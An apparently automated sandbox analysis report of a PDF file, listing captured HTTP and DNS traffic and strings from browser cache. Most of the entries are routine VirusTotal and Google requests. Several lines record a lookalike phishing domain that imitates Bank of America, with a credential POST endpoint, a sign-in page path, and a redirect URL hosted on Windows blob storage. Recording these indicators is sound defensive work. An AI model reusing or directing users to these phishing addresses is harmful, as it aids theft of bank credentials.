Source: global traffic	HTTP traffic detected: GET /gui/27197.598dbd3bfe6cc1efe979.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/51452.65d2fafed16a04e8c3fc.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/53819.2a1d6d2aed818366d95f.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/36018.11aa4f9261da1e45e451.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/54237.a01175962f63b15c8aae.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/2119.c23c584763439c660ad5.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTI4MTE2ODE1MjUtWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NTA2LjU0Mg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTg4NjgzOTA4OTItWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NTA5LjMzMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x334x1X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTk1NDkzMDQ3NjAtWkc5dWRDQmlaU0JsZG1scy0xNzM2OTU5NTEyLjAxMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/94940.eedfd7b9df44dd7c0de1.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/80822.eba81018dae8af7340a0.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/12184.de35bab5655412e07bad.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/63606.9c31194cc61ad3078168.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/67734.4208bb6d5a03af5395e6.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /ui/analyses/u-3f42fd094767b2c1dc7dba5ed47853880ec6f100eca99cb73d56daa6ac7b0f6a-1736959505 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959504.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/80822.eba81018dae8af7340a0.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959512.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/94940.eedfd7b9df44dd7c0de1.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959512.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/12184.de35bab5655412e07bad.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959512.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/63606.9c31194cc61ad3078168.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.1.1736959512.0.0.0

Source: chromecache_351.15.dr	String found in binary or memory: DF_Mk([DF_Ms(),DF_Ml("design:type",Object)],DF_MQf.prototype,"screenReaderTextKey",void 0);DF_MQf=DF_Mk([DF_Mp("df-text-message"),DF_Ml("design:paramtypes",[String,String])],DF_MQf);var DF_MRf=DF_Mq([":host(:only-child) .wrapper{padding:var(--df-messenger-video-inner-padding,0)}:host(:not(.markdown):not(:only-child)) .embed,:host(:not(:only-child)) .link,:host(:not(:only-child)) .video{border:var(--df-messenger-video-inner-border,none);border-radius:var(--df-messenger-video-inner-border-radius,0);overflow:hidden}:host(:not(:only-child)) .wrapper{padding:var(--df-messenger-card-padding,16px)}:host(.markdown) .wrapper{display:inline-block;padding:var(--df-messenger-card-padding,16px);padding-left:0;padding-right:0}:host(.markdown:first-child) .wrapper{padding-top:0}:host(.markdown:last-child) .wrapper{padding-bottom:0}:host(.markdown) .embed,:host(:not(:only-child)) .embed,:host(:not(:only-child)) .link,:host(:not(:only-child)) .video{border:var(--df-messenger-video-inner-border,var(--df-messenger-video-border,var(--df-messenger-default-border)\n )\n );border-radius:var(--df-messenger-video-inner-border-radius,var(--df-messenger-video-border-radius,var(--df-messenger-default-border-radius)\n )\n );overflow:hidden}.link{display:inline-block;position:relative;text-decoration:none}.thumbnail,video{height:var(--df-messenger-video-height,auto);width:var(--df-messenger-video-width,auto)}.thumbnail,iframe,video{display:block;max-width:100%}iframe{height:var(--df-messenger-video-embed-height,var(--df-messenger-video-height,315px)\n );width:var(--df-messenger-video-embed-width,var(--df-messenger-video-width,560px)\n )}.title{align-items:center;color:var(--df-messenger-font-color,var(--df-messenger-default-font-color)\n );display:flex;font-family:var(--df-messenger-font-family,var(--df-messenger-default-font-family)\n );font-size:var(--df-messenger-font-size,var(--df-messenger-default-font-size)\n );padding:12px 16px}.youtube svg{height:24px;margin-right:8px;width:24px}.play{background:#000;border-radius:999px;height:36px;left:50%;opacity:.8;padding:8px;pointer-events:none;position:absolute;top:50%;transform:translate(-50%,-50%);width:36px}.play svg{fill:#fff;height:inherit;width:inherit}"]);function DF_MSf(a){var b,c=(b=a.anchor)!=null?b:a.actionLink?{href:a.actionLink}:null;return c?new DF_MTf(c):null}function DF_MUf(a){var b,c=(b=a.anchor)!=null?b:a.actionLink?{href:a.actionLink}:null;return c?new DF_MTf(c):null}function DF_MTf(a){this.href=(a==null?void 0:a.href)\|\|"";this.target=(a==null?void 0:a.target)\|\|"_blank";this.rel=(a==null?void 0:a.rel)\|\|"noopener noreferrer"};var DF_MVf=DF_Mf([' <div class="wrapper">\n <div class="video">\n <video src="','" controls>',"</video>\n ","\n </div>\n </div>"]),DF_MWf=DF_Mf(["https://www.youtube.com/embed"]),DF_MXf=DF_Mf([' <div class="wrapper">\n <div class="embed">\n <iframe\n src="','"\n title="','"\n
Source: chromecache_324.15.dr, chromecache_373.15.dr, chromecache_388.15.dr, chromecache_490.15.dr, chromecache_473.15.dr, chromecache_343.15.dr	String found in binary or memory: return b}QE.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),SE=["www.youtube.com","www.youtube-nocookie.com"],TE,UE=!1; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic	DNS traffic detected: DNS query: online.access.secure.bankofamerlica.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: virustotal.com
Source: global traffic	DNS traffic detected: DNS query: www.virustotal.com
Source: global traffic	DNS traffic detected: DNS query: www.recaptcha.net
Source: global traffic	DNS traffic detected: DNS query: recaptcha.net

Source: unknown

HTTP traffic detected: POST /secure/secure.php HTTP/1.1Host: online.access.secure.bankofamerlica.comConnection: keep-aliveContent-Length: 76sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://online.access.secure.bankofamerlica.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://online.access.secure.bankofamerlica.com/secure/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D

Source: chromecache_366.15.dr	String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: http://api.jqueryui.com/position/
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: http://bassistance.de/jquery-plugins/jquery-plugin-validation/
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: http://docs.jquery.com/Plugins/Validation
Source: chromecache_463.15.dr	String found in binary or memory: http://jquery.org/license
Source: chromecache_463.15.dr	String found in binary or memory: http://jqueryui.com
Source: chromecache_509.15.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_353.15.dr	String found in binary or memory: http://www.broofa.com
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: DEEZI80S.pdf	String found in binary or memory: http://www.reportlab.com
Source: DEEZI80S.pdf	String found in binary or memory: http://www.reportlab.com)
Source: 2D85F72862B55C4EADD9E66E06947F3D0.2.dr	String found in binary or memory: http://x1.i.lencr.org/
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://accounts.google.com/gsi/client
Source: chromecache_421.15.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_421.15.dr	String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_343.15.dr	String found in binary or memory: https://adservice.google.com/pagead/regclk?
Source: chromecache_319.15.dr, chromecache_410.15.dr	String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: chromecache_421.15.dr, chromecache_353.15.dr	String found in binary or memory: https://apis.google.com
Source: chromecache_509.15.dr	String found in binary or memory: https://apis.google.com/js/api.js
Source: chromecache_324.15.dr, chromecache_373.15.dr, chromecache_388.15.dr, chromecache_490.15.dr, chromecache_473.15.dr, chromecache_343.15.dr	String found in binary or memory: https://cct.google/taggy/agent.js
Source: chromecache_421.15.dr	String found in binary or memory: https://clients6.google.com
Source: chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	String found in binary or memory: https://cloud.google.com/contact
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://cloud.google.com/dialogflow/cx/docs/concept/integration/dialogflow-messenger/fulfillment.
Source: chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	String found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://cloud.google.com/terms/service-terms
Source: DEEZI80S.pdf	String found in binary or memory: https://connectauthentication.blob.core.windows.net/open/complete.html?h9dhy)
Source: chromecache_421.15.dr	String found in binary or memory: https://content.googleapis.com
Source: chromecache_351.15.dr	String found in binary or memory: https://d30y9cdsu7xlg0.cloudfront.net/png/29715-200.png
Source: chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
Source: chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
Source: chromecache_478.15.dr, chromecache_505.15.dr, chromecache_390.15.dr, chromecache_460.15.dr, chromecache_517.15.dr	String found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://dialogflow.cloud.google.com/v1/cx/integrations/messenger/webhook
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://dialogflow.cloud.google.com/v1/cx/locations/
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://dialogflow.googleapis.com/v3
Source: chromecache_342.15.dr, chromecache_502.15.dr, chromecache_474.15.dr, chromecache_485.15.dr	String found in binary or memory: https://docs.virustotal.com/reference/overview
Source: chromecache_421.15.dr	String found in binary or memory: https://domains.google.com/suggest/flow
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://fls.doubleclick.net/activityi
Source: chromecache_456.15.dr	String found in binary or memory: https://fonts.google.com/license/googlerestricted
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: chromecache_351.15.dr	String found in binary or memory: https://fonts.googleapis.com/icon?family=Material
Source: chromecache_456.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v60/4Ua_rENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RF
Source: chromecache_353.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_353.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_353.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_353.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/short-term/release/googlesymbols/cloud_download/default/24px.svg
Source: chromecache_395.15.dr	String found in binary or memory: https://fonts.gstatic.com/s/materialicons/v143/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2)
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://github.com/chjj/)
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://github.com/ded/bowser
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://github.com/jquery/jquery-color
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://github.com/markedjs/marked.
Source: chromecache_343.15.dr	String found in binary or memory: https://google.com
Source: chromecache_343.15.dr	String found in binary or memory: https://googleads.g.doubleclick.net
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://npmcdn.com/jsencrypt
Source: chromecache_307.15.dr	String found in binary or memory: https://online.access.secure.bankofamerlica.com/?ref=9854tjwe46
Source: chromecache_519.15.dr, chromecache_495.15.dr	String found in binary or memory: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go
Source: chromecache_343.15.dr	String found in binary or memory: https://pagead2.googlesyndication.com
Source: chromecache_324.15.dr, chromecache_373.15.dr, chromecache_388.15.dr, chromecache_490.15.dr, chromecache_473.15.dr, chromecache_343.15.dr	String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_517.15.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_421.15.dr	String found in binary or memory: https://plus.google.com
Source: chromecache_421.15.dr	String found in binary or memory: https://plus.googleapis.com
Source: chromecache_397.15.dr	String found in binary or memory: https://recaptcha.net/recaptcha/api2/
Source: chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card.asp?
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_d.asp
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_d.asp?
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp
Source: chromecache_465.15.dr, chromecache_463.15.dr	String found in binary or memory: https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp?r=
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://speech.googleapis.com/v1p1beta1/speech:recognize?key=
Source: chromecache_324.15.dr, chromecache_373.15.dr, chromecache_490.15.dr, chromecache_343.15.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_410.15.dr	String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://storage.googleapis.com/
Source: chromecache_417.15.dr, chromecache_351.15.dr	String found in binary or memory: https://storage.googleapis.com/upload/storage/v1/b/
